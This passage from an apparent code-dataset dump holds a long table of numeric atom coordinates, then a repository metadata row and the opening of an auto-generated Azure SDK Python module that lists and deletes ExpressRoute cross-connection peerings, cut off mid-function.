615 1 0.181967 0.376729 0.567518
619 1 0.308414 0.37681 0.565389
620 1 0.252047 0.437376 0.562938
742 1 0.187978 0.437311 0.628779
745 1 0.248274 0.379597 0.632983
746 1 0.312628 0.435548 0.62615
1673 1 0.246357 0.494375 0.626817
577 1 0.00510221 0.249412 0.511243
1543 1 0.184057 0.494584 0.562051
1809 1 0.499947 0.511026 0.747181
623 1 0.437988 0.37318 0.559925
624 1 0.380773 0.442824 0.558946
749 1 0.375961 0.379343 0.618894
750 1 0.435258 0.438368 0.624516
1551 1 0.43625 0.498358 0.567557
564 1 0.499999 0.187911 0.556066
1669 1 0.124031 0.498725 0.622833
1539 1 0.0594654 0.497474 0.566614
1544 1 0.128719 0.561425 0.565063
1571 1 0.0640524 0.622686 0.558382
1666 1 0.0639982 0.560438 0.624508
1701 1 0.120652 0.628086 0.622104
929 1 0.00226069 0.122809 0.873626
1844 1 0.493543 0.693818 0.810513
1547 1 0.317785 0.504211 0.558164
1548 1 0.249424 0.570303 0.565527
1575 1 0.191342 0.632646 0.566871
1579 1 0.31094 0.632143 0.562372
1670 1 0.191556 0.558747 0.61749
1674 1 0.310405 0.56004 0.622469
1705 1 0.250536 0.630154 0.631864
772 1 0.00596692 0.0648479 0.813157
1677 1 0.372748 0.502794 0.624932
1552 1 0.37913 0.563219 0.561024
1583 1 0.433431 0.622802 0.551848
1678 1 0.436728 0.56185 0.626325
1709 1 0.373827 0.625168 0.628242
1541 1 0.120137 0.498803 0.50647
1637 1 0.126416 0.870481 0.504586
42 1 0.311749 0.190849 0.997145
660 1 0.499151 0.0665702 0.685409
1576 1 0.127184 0.692389 0.556141
1603 1 0.0609497 0.752045 0.55972
1608 1 0.126943 0.808558 0.566963
1698 1 0.0731661 0.692795 0.617478
1730 1 0.0630094 0.807714 0.627986
1733 1 0.129087 0.753793 0.63073
2017 1 0.00207008 0.872073 0.879974
932 1 0.000925772 0.193611 0.93787
1777 1 0.498623 0.872124 0.618788
641 1 0.0018219 0.00123508 0.621598
1652 1 0.495877 0.937758 0.560031
1580 1 0.254863 0.695905 0.560081
1607 1 0.192666 0.752406 0.56493
1611 1 0.315587 0.751245 0.565094
1612 1 0.258638 0.813304 0.559565
1702 1 0.179764 0.69447 0.623199
1706 1 0.311512 0.692664 0.624902
1734 1 0.187401 0.810243 0.628095
1737 1 0.256239 0.758833 0.627738
1738 1 0.312228 0.815258 0.632999
1732 1 0.00290338 0.80465 0.692125
1905 1 0.497669 0.880389 0.745059
644 1 0.0104822 0.0554352 0.683426
692 1 0.497763 0.190401 0.684087
1584 1 0.369939 0.684252 0.563217
1615 1 0.436198 0.743448 0.558506
1616 1 0.369992 0.814646 0.556615
1710 1 0.43807 0.68291 0.620401
1741 1 0.373877 0.758863 0.629287
1742 1 0.44663 0.800666 0.626498
2030 1 0.440905 0.937626 0.877273
1716 1 0.500194 0.681278 0.68404
1636 1 0.0028323 0.933822 0.558646
1620 1 0.498145 0.809947 0.561538
645 1 0.133889 0.000149379 0.635852
1635 1 0.0626861 0.875047 0.564362
1640 1 0.127575 0.934673 0.562079
1762 1 0.0620404 0.937878 0.622764
1765 1 0.128437 0.870645 0.623234
801 1 0.000599021 0.111601 0.742532
523 1 0.310404 1.00002 0.555652
1639 1 0.19179 0.874757 0.564431
1643 1 0.314204 0.876968 0.563432
1644 1 0.249546 0.937018 0.560024
1766 1 0.192319 0.939018 0.632605
1769 1 0.248856 0.870633 0.627293
1770 1 0.323135 0.936901 0.627933
852 1 0.50055 0.315839 0.807726
1029 1 0.124377 0.496603 0.999773
527 1 0.43927 0.00661804 0.56012
1134 1 0.43566 0.93428 0.999685
1647 1 0.440849 0.872877 0.562715
1648 1 0.373073 0.945329 0.560451
1773 1 0.370939 0.873374 0.620064
1774 1 0.431633 0.939083 0.614704
817 1 0.497508 0.128986 0.745576
881 1 0.497731 0.382507 0.751532
1748 1 0.499718 0.810558 0.69346
648 1 0.123815 0.0632718 0.683326
675 1 0.0715135 0.123845 0.685478
770 1 0.0687247 0.0565199 0.746072
776 1 0.129586 0.0584929 0.808641
803 1 0.0687401 0.12048 0.800832
805 1 0.131141 0.120364 0.750219
771 1 0.0627579 0.993385 0.811755
652 1 0.250173 0.0683582 0.687448
679 1 0.184601 0.122671 0.682323
683 1 0.310397 0.125931 0.688356
774 1 0.197369 0.0629343 0.751987
778 1 0.308361 0.057419 0.748606
780 1 0.245996 0.061019 0.816401
807 1 0.185206 0.127926 0.807097
809 1 0.253992 0.128457 0.757682
811 1 0.312179 0.128322 0.816247
779 1 0.314683 0.997784 0.812568
777 1 0.255839 0.997411 0.756402
647 1 0.19755 0.0010089 0.692744
656 1 0.373973 0.0665076 0.691536
687 1 0.434426 0.130512 0.680279
782 1 0.436592 0.0643337 0.749592
784 1 0.371447 0.0623557 0.815114
813 1 0.372729 0.119929 0.755551
815 1 0.435726 0.13079 0.810348
1553 1 0.495393 0.504469 0.500139
781 1 0.376696 0.00341384 0.748142
1577 1 0.252494 0.631107 0.499644
34 1 0.0694382 0.185689 0.991605
2029 1 0.373328 0.877084 0.878533
680 1 0.125488 0.186089 0.691858
707 1 0.0658074 0.244405 0.688538
712 1 0.132364 0.310387 0.694014
802 1 0.0654326 0.185724 0.752646
808 1 0.125843 0.18896 0.810925
834 1 0.053685 0.31197 0.743513
835 1 0.0569544 0.247396 0.801844
837 1 0.125965 0.251893 0.752879
840 1 0.12323 0.309991 0.80745
684 1 0.251107 0.18462 0.685942
711 1 0.191803 0.247374 0.690896
715 1 0.316155 0.247981 0.684815
716 1 0.252695 0.316036 0.693052
806 1 0.191799 0.18711 0.749204
810 1 0.314708 0.189438 0.758202
812 1 0.249503 0.189182 0.807916
838 1 0.193076 0.316675 0.756947
839 1 0.189268 0.245292 0.8046
841 1 0.252854 0.249146 0.745329
842 1 0.313696 0.316137 0.751426
843 1 0.308969 0.249746 0.815769
844 1 0.253045 0.318785 0.817244
1542 1 0.197189 0.556668 0.50006
2023 1 0.182362 0.871259 0.935012
1985 1 0.00186657 0.73647 0.881461
688 1 0.380412 0.190831 0.69752
719 1 0.436883 0.253463 0.68364
720 1 0.372423 0.311439 0.69095
814 1 0.441154 0.19109 0.75434
816 1 0.376937 0.18973 0.815109
845 1 0.3795 0.251198 0.757732
846 1 0.437365 0.308622 0.750603
847 1 0.438731 0.255374 0.817785
848 1 0.379257 0.317151 0.815725
739 1 0.0656507 0.378647 0.692795
744 1 0.12614 0.436811 0.685333
866 1 0.0659782 0.439863 0.750137
867 1 0.0595369 0.381182 0.800884
869 1 0.128723 0.378427 0.755201
872 1 0.12509 0.446814 0.811066
1667 1 0.054623 0.505987 0.682508
1797 1 0.119083 0.507435 0.74701
743 1 0.191109 0.373755 0.69124
747 1 0.315918 0.380824 0.692103
748 1 0.257061 0.441634 0.694028
870 1 0.188835 0.444111 0.751979
871 1 0.190065 0.379878 0.814376
873 1 0.252347 0.376402 0.750349
874 1 0.321812 0.434121 0.756598
875 1 0.321634 0.376475 0.816011
876 1 0.261064 0.43893 0.819421
1801 1 0.258023 0.496367 0.757682
1799 1 0.19051 0.499942 0.824224
1671 1 0.187656 0.501104 0.685645
1803 1 0.319533 0.496086 0.821888
1780 1 0.498347 0.943529 0.68943
751 1 0.437003 0.379465 0.688761
752 1 0.376361 0.440606 0.687569
877 1 0.385343 0.375799 0.750577
878 1 0.441018 0.444079 0.755637
879 1 0.439045 0.37937 0.816083
880 1 0.383493 0.43463 0.817308
1805 1 0.3687 0.501229 0.747892
1795 1 0.0532087 0.502562 0.812529
1672 1 0.127128 0.559035 0.686252
1699 1 0.0559738 0.625877 0.682655
1794 1 0.0584834 0.562659 0.749548
1800 1 0.121177 0.562349 0.811061
1827 1 0.0621523 0.621556 0.809491
1829 1 0.125736 0.621646 0.744713
1604 1 0.00676994 0.813406 0.562854
905 1 0.24437 0.999662 0.866237
907 1 0.313874 0.998424 0.946296
1675 1 0.313025 0.497162 0.684547
1676 1 0.251444 0.558454 0.68083
1703 1 0.185988 0.626122 0.683866
1707 1 0.309941 0.625679 0.688715
1798 1 0.188503 0.555807 0.754764
1802 1 0.314149 0.569936 0.75013
1804 1 0.255297 0.559308 0.813965
1831 1 0.182666 0.628203 0.812472
1833 1 0.242815 0.628459 0.754278
1835 1 0.317255 0.618289 0.814762
1807 1 0.447268 0.499616 0.811895
1679 1 0.440159 0.500782 0.684586
1680 1 0.37584 0.55824 0.690291
1711 1 0.444996 0.622643 0.686201
1806 1 0.43994 0.561332 0.748923
1808 1 0.374894 0.560008 0.811172
1837 1 0.377152 0.626612 0.738795
1839 1 0.435209 0.625749 0.814335
1704 1 0.123966 0.686449 0.687476
1731 1 0.0625033 0.748587 0.689493
1736 1 0.125491 0.811235 0.687396
1826 1 0.0641936 0.688955 0.744493
1832 1 0.113112 0.688254 0.806938
1858 1 0.062125 0.805698 0.754552
1859 1 0.0533376 0.746908 0.810155
1861 1 0.124668 0.746271 0.746006
1864 1 0.123438 0.808154 0.809238
516 1 0.000360991 0.0689656 0.560788
1708 1 0.247743 0.693864 0.683967
1735 1 0.19331 0.758808 0.685433
1739 1 0.316756 0.753162 0.690397
1740 1 0.24732 0.817392 0.690751
1830 1 0.186333 0.686621 0.750196
1834 1 0.315378 0.688775 0.747726
1836 1 0.24195 0.688054 0.812689
1862 1 0.184997 0.809827 0.754687
1863 1 0.183641 0.749134 0.814251
1865 1 0.25818 0.7459 0.751672
1866 1 0.316232 0.812202 0.756334
1867 1 0.311436 0.751806 0.81506
1868 1 0.246382 0.811001 0.810099
769 1 0.00197362 0.00244668 0.75356
721 1 0.501656 0.256104 0.618178
1712 1 0.381423 0.690545 0.67862
1743 1 0.437913 0.750569 0.696013
1744 1 0.376776 0.822359 0.688562
1838 1 0.432112 0.686844 0.744947
1840 1 0.375544 0.688817 0.815388
1869 1 0.374799 0.760121 0.751598
1870 1 0.441091 0.817424 0.751925
1871 1 0.432293 0.758456 0.813486
1872 1 0.374006 0.819757 0.81459
673 1 0.000732646 0.122567 0.628393
657 1 0.499146 0.993016 0.624781
45 1 0.369021 0.118512 0.996571
1921 1 0.00182092 0.496117 0.876532
643 1 0.0641258 0.991119 0.689014
773 1 0.121038 0.993394 0.749768
1763 1 0.0547143 0.87423 0.681498
1768 1 0.127646 0.93463 0.688429
1890 1 0.0558112 0.932969 0.756925
1891 1 0.0556957 0.873249 0.815589
1893 1 0.121015 0.878208 0.753493
1896 1 0.123327 0.931308 0.818116
2 1 0.0658173 0.0607994 0.998931
901 1 0.124172 0.995588 0.882624
775 1 0.174214 0.993844 0.815135
651 1 0.31404 0.994271 0.690079
1767 1 0.181605 0.874756 0.688202
1771 1 0.317602 0.874031 0.692539
1772 1 0.256974 0.936133 0.689416
1894 1 0.191925 0.936504 0.754893
1895 1 0.185231 0.876332 0.811822
1897 1 0.253519 0.875997 0.75135
1898 1 0.320201 0.935488 0.749792
1899 1 0.316043 0.878903 0.818012
1900 1 0.252974 0.933835 0.812281
2027 1 0.306208 0.878153 0.936363
1999 1 0.439467 0.752573 0.937069
783 1 0.445744 1.00037 0.814371
655 1 0.440343 0.0104036 0.687435
1775 1 0.444153 0.879686 0.680785
1776 1 0.385327 0.938658 0.6807
1901 1 0.379564 0.878169 0.752628
1902 1 0.437484 0.939674 0.756539
1903 1 0.442418 0.878466 0.814536
1904 1 0.378778 0.942061 0.819664
898 1 0.057196 0.0575086 0.874735
904 1 0.1238 0.0631701 0.936912
931 1 0.0645168 0.121558 0.934463
933 1 0.12634 0.132915 0.871572
102 1 0.192942 0.440087 0.995471
899 1 0.0645493 0.999602 0.943014
69 1 0.124316 0.24885 0.99526
676 1 0.00571507 0.185698 0.690907
1556 1 0.494317 0.561138 0.561705
1995 1 0.305289 0.748763 0.937899
902 1 0.186701 0.0623423 0.879056
906 1 0.301852 0.0618685 0.871439
908 1 0.245355 0.0654125 0.937541
935 1 0.189581 0.129332 0.935199
937 1 0.236343 0.131526 0.864791
939 1 0.311546 0.127771 0.937102
1996 1 0.251232 0.814121 0.942979
2025 1 0.245723 0.87381 0.867435
1991 1 0.190065 0.749352 0.941111
1998 1 0.437383 0.821198 0.877679
910 1 0.438064 0.0567752 0.873018
912 1 0.367951 0.0607949 0.935275
941 1 0.383541 0.120228 0.875501
943 1 0.435476 0.116136 0.938235
2022 1 0.185272 0.931106 0.878513
930 1 0.0586169 0.184999 0.871282
936 1 0.127687 0.194528 0.932634
962 1 0.0611355 0.310161 0.863401
963 1 0.0592645 0.254106 0.927269
965 1 0.122943 0.248476 0.866564
968 1 0.121783 0.305507 0.929101
1958 1 0.18204 0.691293 0.874967
1964 1 0.244378 0.68517 0.938731
37 1 0.130206 0.126874 0.997449
934 1 0.188662 0.194471 0.874177
938 1 0.309425 0.186258 0.872853
940 1 0.254593 0.188746 0.937757
966 1 0.183136 0.308462 0.866245
967 1 0.186874 0.247557 0.932074
969 1 0.248036 0.257609 0.87188
970 1 0.317613 0.304342 0.873077
971 1 0.312254 0.245943 0.934881
972 1 0.248416 0.309535 0.938958
1966 1 0.434146 0.692926 0.870398
1968 1 0.369448 0.691562 0.940839
2026 1 0.314636 0.93597 0.875944
973 1 0.382305 0.247556 0.880076
944 1 0.37933 0.184032 0.936097
942 1 0.43945 0.185354 0.87405
976 1 0.370115 0.310428 0.943083
975 1 0.446443 0.243382 0.942095
974 1 0.440433 0.309832 0.887705
2028 1 0.244546 0.933213 0.946901
903 1 0.188549 0.00336506 0.93813
995 1 0.0658704 0.366791 0.928996
994 1 0.0616245 0.432058 0.874883
1000 1 0.124437 0.439096 0.936355
997 1 0.131884 0.377558 0.8739
1925 1 0.11888 0.496081 0.876992
998 1 0.196336 0.435414 0.878721
999 1 0.190383 0.374319 0.94043
1004 1 0.258957 0.436165 0.938099
1001 1 0.252775 0.376553 0.876843
1002 1 0.319616 0.437641 0.88003
1003 1 0.31837 0.368249 0.938032
1929 1 0.252628 0.497959 0.874993
1927 1 0.183831 0.50073 0.933959
1997 1 0.375268 0.753037 0.880934
2021 1 0.120907 0.870081 0.876919
1935 1 0.433761 0.497232 0.942544
1006 1 0.445908 0.438337 0.877866
1007 1 0.438433 0.377893 0.941036
1005 1 0.379618 0.371833 0.882147
1008 1 0.376373 0.430001 0.944569
618 1 0.315684 0.440572 0.505715
2000 1 0.368248 0.816397 0.942669
1923 1 0.0603876 0.501027 0.94025
1922 1 0.0641632 0.568887 0.87597
1928 1 0.126493 0.566133 0.932849
1955 1 0.0615793 0.625914 0.941485
1957 1 0.119855 0.630035 0.876498
1931 1 0.321025 0.497917 0.938149
1930 1 0.317474 0.561447 0.881146
1926 1 0.185393 0.571867 0.876105
1963 1 0.315046 0.619896 0.940713
1961 1 0.255403 0.620819 0.874536
1932 1 0.254523 0.557859 0.940743
1959 1 0.18774 0.621303 0.937597
101 1 0.128267 0.372479 0.994001
1965 1 0.380284 0.62991 0.874858
1933 1 0.380755 0.4996 0.874313
1934 1 0.44068 0.562525 0.867585
1936 1 0.373429 0.557591 0.939867
1967 1 0.434178 0.626591 0.934722
2018 1 0.0562667 0.939308 0.880616
1645 1 0.37292 0.883949 0.500644
1986 1 0.062728 0.808636 0.87709
1987 1 0.0649266 0.748505 0.940496
1954 1 0.0628725 0.688741 0.874063
1992 1 0.126664 0.808882 0.944444
1989 1 0.11751 0.755229 0.87117
1960 1 0.127991 0.68945 0.940511
2024 1 0.119328 0.933088 0.945891
2019 1 0.0629822 0.869326 0.941437
1993 1 0.24825 0.751096 0.880715
1962 1 0.307056 0.683228 0.87174
1990 1 0.182964 0.811126 0.872134
1994 1 0.316367 0.813378 0.875495
578 1 0.0627028 0.304823 0.506388
5 1 0.125446 0.000723105 0.997321
98 1 0.0589141 0.434514 0.989479
517 1 0.121322 0.99671 0.503666
1614 1 0.436843 0.813252 0.506719
546 1 0.059554 0.191945 0.502994
1606 1 0.191597 0.810501 0.505685
585 1 0.241013 0.251271 0.504118
105 1 0.250517 0.368615 0.994275
550 1 0.189966 0.184479 0.504277
593 1 0.496416 0.252541 0.501958
70 1 0.18703 0.312825 0.989453
66 1 0.0572404 0.310689 0.99272
1065 1 0.245152 0.618559 0.997561
1646 1 0.439152 0.936101 0.505053
14 1 0.431062 0.0605496 0.998991
513 1 0.00416782 0.995082 0.501345
521 1 0.24454 0.00546919 0.501048
49 1 0.49628 0.117444 0.99618
38 1 0.18686 0.18882 0.993603
1537 1 0.002744 0.496115 0.50043
1609 1 0.25181 0.751717 0.5017
1641 1 0.256223 0.878358 0.502951
589 1 0.377624 0.255393 0.50084
610 1 0.067379 0.43526 0.506343
557 1 0.373615 0.12302 0.501914
1093 1 0.129804 0.745721 0.998706
1613 1 0.370087 0.750559 0.502235
586 1 0.309577 0.312288 0.505774
590 1 0.436916 0.314994 0.501716
614 1 0.18108 0.435478 0.502321
24 1 0.61652 0.0639868 0.0639923
51 1 0.561726 0.123549 0.0625075
146 1 0.558751 0.0624668 0.128246
181 1 0.619534 0.132627 0.125983
1046 1 0.688794 0.561295 0.00676505
1042 1 0.55412 0.56842 0.00604627
30 1 0.944 0.0704449 0.0111431
1156 1 0.996311 0.567463 0.182661
1141 1 0.620855 0.869622 0.00477491
1625 1 0.750271 0.753212 0.497917
28 1 0.752431 0.067535 0.0591513
55 1 0.689401 0.12472 0.0612507
59 1 0.815374 0.123993 0.0630316
150 1 0.684785 0.0645301 0.118252
154 1 0.804772 0.0585936 0.118982
185 1 0.757183 0.126348 0.125756
20 1 0.504395 0.0669701 0.0636847
32 1 0.872091 0.0632495 0.0715122
63 1 0.941012 0.132287 0.0682557
158 1 0.941459 0.0585374 0.11878
189 1 0.87685 0.130752 0.126623
31 1 0.934739 0.00450296 0.0575795
1654 1 0.677654 0.931476 0.497526
157 1 0.870614 0.00178006 0.125142
1092 1 0.998545 0.811784 0.0685379
65 1 0.995841 0.250654 0.00154696
356 1 0.999726 0.435274 0.310781
385 1 0.999152 0.998112 0.37711
56 1 0.624507 0.186271 0.0605496
83 1 0.557814 0.249569 0.0596813
88 1 0.62561 0.309367 0.0649043
178 1 0.553311 0.182163 0.120937
210 1 0.564413 0.315219 0.131536
213 1 0.628088 0.248575 0.11839
1533 1 0.867562 0.878912 0.370549
122 1 0.816081 0.43848 0.0035237
420 1 0.997591 0.191417 0.438142
60 1 0.7468 0.189071 0.0676724
87 1 0.694176 0.250758 0.0623218
91 1 0.810815 0.253773 0.0614268
92 1 0.755093 0.31551 0.0672134
182 1 0.688581 0.178886 0.12295
186 1 0.809707 0.190719 0.121646
214 1 0.68904 0.308419 0.129847
217 1 0.752983 0.250292 0.127412
218 1 0.815878 0.310097 0.13401
1281 1 0.996535 0.502691 0.249765
64 1 0.871505 0.188049 0.0625631
95 1 0.929725 0.25496 0.0708676
96 1 0.870895 0.309479 0.0686052
190 1 0.937005 0.191163 0.128611
221 1 0.874065 0.247912 0.131181
222 1 0.942598 0.310634 0.127805
1534 1 0.93834 0.937908 0.377309
1535 1 0.941257 0.869733 0.440643
1444 1 0.998276 0.682695 0.437442
177 1 0.500418 0.117943 0.124285
125 1 0.876912 0.38303 0.000934928
115 1 0.563964 0.373598 0.0643414
120 1 0.627402 0.439479 0.0646914
242 1 0.569412 0.442108 0.122812
245 1 0.624382 0.377824 0.130061
1043 1 0.563025 0.499787 0.0561492
1536 1 0.878961 0.930645 0.43788
1425 1 0.504436 0.504243 0.374606
1140 1 0.503095 0.930024 0.0598587
340 1 0.503502 0.311541 0.317335
119 1 0.686595 0.372349 0.06684
123 1 0.819614 0.377564 0.066021
124 1 0.744076 0.439161 0.0620933
246 1 0.685383 0.438552 0.128725
249 1 0.751116 0.381552 0.124045
250 1 0.811988 0.436888 0.125968
84 1 0.504528 0.312291 0.0711695
1428 1 0.501529 0.558912 0.435462
1145 1 0.751496 0.877711 0.000464378
127 1 0.936222 0.375454 0.0759746
128 1 0.875048 0.439422 0.0661696
253 1 0.871544 0.377105 0.12791
254 1 0.94362 0.439895 0.122879
1055 1 0.936701 0.503677 0.0601806
436 1 0.500698 0.185763 0.440782
1173 1 0.625807 0.508178 0.125937
1048 1 0.622871 0.570642 0.0684236
1075 1 0.557108 0.631153 0.0642313
1170 1 0.560186 0.567275 0.119217
1205 1 0.616195 0.624628 0.130091
1316 1 0.999063 0.68712 0.31225
132 1 1.00008 0.062578 0.188956
1521 1 0.508024 0.874829 0.373017
1051 1 0.814176 0.506819 0.061355
1047 1 0.687021 0.504456 0.0666931
1177 1 0.743878 0.505912 0.122531
1052 1 0.749744 0.563382 0.0649402
1079 1 0.688812 0.624236 0.0690357
1083 1 0.815371 0.622036 0.0703736
1174 1 0.683543 0.562909 0.133605
1178 1 0.812061 0.55981 0.124245
1209 1 0.74804 0.624291 0.125386
415 1 0.934907 0.994242 0.441957
1181 1 0.87708 0.492076 0.130159
1056 1 0.877259 0.564234 0.0643564
1087 1 0.934187 0.626377 0.0650532
1182 1 0.931407 0.559891 0.123895
1213 1 0.873629 0.630118 0.130939
1113 1 0.748697 0.74748 0.00538187
465 1 0.505633 0.250118 0.378674
1028 1 0.997044 0.566149 0.0581306
1080 1 0.62424 0.690863 0.0685395
1107 1 0.567208 0.749001 0.0634145
1112 1 0.631343 0.811577 0.0600996
1202 1 0.564542 0.689331 0.134079
1234 1 0.562259 0.812773 0.128356
1237 1 0.630929 0.75889 0.124475
1106 1 0.559274 0.807677 0.00986916
1084 1 0.745919 0.690085 0.0694717
1111 1 0.690557 0.756605 0.0687368
1115 1 0.808659 0.749774 0.0664194
1116 1 0.751162 0.819822 0.0610201
1206 1 0.687114 0.690704 0.12728
1210 1 0.807756 0.686529 0.127813
1238 1 0.688306 0.819668 0.1259
1241 1 0.744014 0.751008 0.131916
1242 1 0.809286 0.81876 0.122835
1088 1 0.876383 0.691614 0.0661843
1119 1 0.933659 0.746669 0.0607069
1120 1 0.87819 0.809391 0.0580108
1214 1 0.935978 0.691401 0.129082
1245 1 0.873919 0.74841 0.127201
1246 1 0.936212 0.812516 0.126039
1265 1 0.503136 0.878486 0.12763
409 1 0.74581 0.994191 0.378363
257 1 0.999812 0.00362646 0.246403
161 1 0.99781 0.128134 0.129134
19 1 0.56353 0.00415987 0.0560429
149 1 0.621777 0.00167839 0.122669
407 1 0.685206 0.00209633 0.44228
1526 1 0.688929 0.93951 0.374468
1396 1 0.505237 0.938843 0.315137
1139 1 0.561399 0.872077 0.0643804
1144 1 0.616696 0.939873 0.0598986
1266 1 0.56245 0.94122 0.123609
1269 1 0.617142 0.877981 0.124407
27 1 0.810412 0.998387 0.0612406
153 1 0.744265 0.999163 0.127431
23 1 0.687332 0.00392487 0.0586999
1143 1 0.68961 0.870572 0.062952
1147 1 0.820933 0.87578 0.0598506
1148 1 0.759222 0.935119 0.062876
1270 1 0.685855 0.93349 0.119691
1273 1 0.750891 0.88057 0.128257
1274 1 0.811681 0.936916 0.120686
1151 1 0.930596 0.884005 0.0606789
1152 1 0.870896 0.944437 0.0632751
1277 1 0.879408 0.879168 0.130903
1278 1 0.9449 0.946178 0.124067
324 1 0.995707 0.317139 0.31026
68 1 0.994834 0.312223 0.0632206
209 1 0.50372 0.246014 0.126917
1529 1 0.757154 0.878888 0.376157
152 1 0.61783 0.0642537 0.18419
179 1 0.562089 0.126493 0.189917
274 1 0.560756 0.063073 0.246547
[... ~870 numeric rows omitted: each line holds an integer index, a constant flag "1", and three fractional coordinates (x, y, z) lying roughly in [0, 1] ...]
| [
"[email protected]"
] | |
531c869b8d3f9fe70205838abde06be395c48c31 | a838d4bed14d5df5314000b41f8318c4ebe0974e | /sdk/network/azure-mgmt-network/azure/mgmt/network/v2020_11_01/operations/_express_route_cross_connection_peerings_operations.py | 08a8881447d83d94b97f3db5ac473f1b5a9e0a4e | [
"MIT",
"LicenseRef-scancode-generic-cla",
"LGPL-2.1-or-later"
] | permissive | scbedd/azure-sdk-for-python | ee7cbd6a8725ddd4a6edfde5f40a2a589808daea | cc8bdfceb23e5ae9f78323edc2a4e66e348bb17a | refs/heads/master | 2023-09-01T08:38:56.188954 | 2021-06-17T22:52:28 | 2021-06-17T22:52:28 | 159,568,218 | 2 | 0 | MIT | 2019-08-11T21:16:01 | 2018-11-28T21:34:49 | Python | UTF-8 | Python | false | false | 22,711 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.core.polling import LROPoller, NoPolling, PollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.arm_polling import ARMPolling
from .. import models as _models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar, Union
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class ExpressRouteCrossConnectionPeeringsOperations(object):
"""ExpressRouteCrossConnectionPeeringsOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2020_11_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def list(
self,
resource_group_name, # type: str
cross_connection_name, # type: str
**kwargs # type: Any
):
# type: (...) -> Iterable["_models.ExpressRouteCrossConnectionPeeringList"]
"""Gets all peerings in a specified ExpressRouteCrossConnection.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param cross_connection_name: The name of the ExpressRouteCrossConnection.
:type cross_connection_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either ExpressRouteCrossConnectionPeeringList or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2020_11_01.models.ExpressRouteCrossConnectionPeeringList]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ExpressRouteCrossConnectionPeeringList"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-11-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'crossConnectionName': self._serialize.url("cross_connection_name", cross_connection_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('ExpressRouteCrossConnectionPeeringList', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/expressRouteCrossConnections/{crossConnectionName}/peerings'} # type: ignore
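    # Usage sketch (not part of the generated code): assumes a configured
    # NetworkManagementClient named `client`; resource names are illustrative.
    #
    #   for peering in client.express_route_cross_connection_peerings.list(
    #           resource_group_name='my-rg',
    #           cross_connection_name='my-cross-connection'):
    #       print(peering.name)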
def _delete_initial(
self,
resource_group_name, # type: str
cross_connection_name, # type: str
peering_name, # type: str
**kwargs # type: Any
):
# type: (...) -> None
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-11-01"
accept = "application/json"
# Construct URL
url = self._delete_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'crossConnectionName': self._serialize.url("cross_connection_name", cross_connection_name, 'str'),
'peeringName': self._serialize.url("peering_name", peering_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
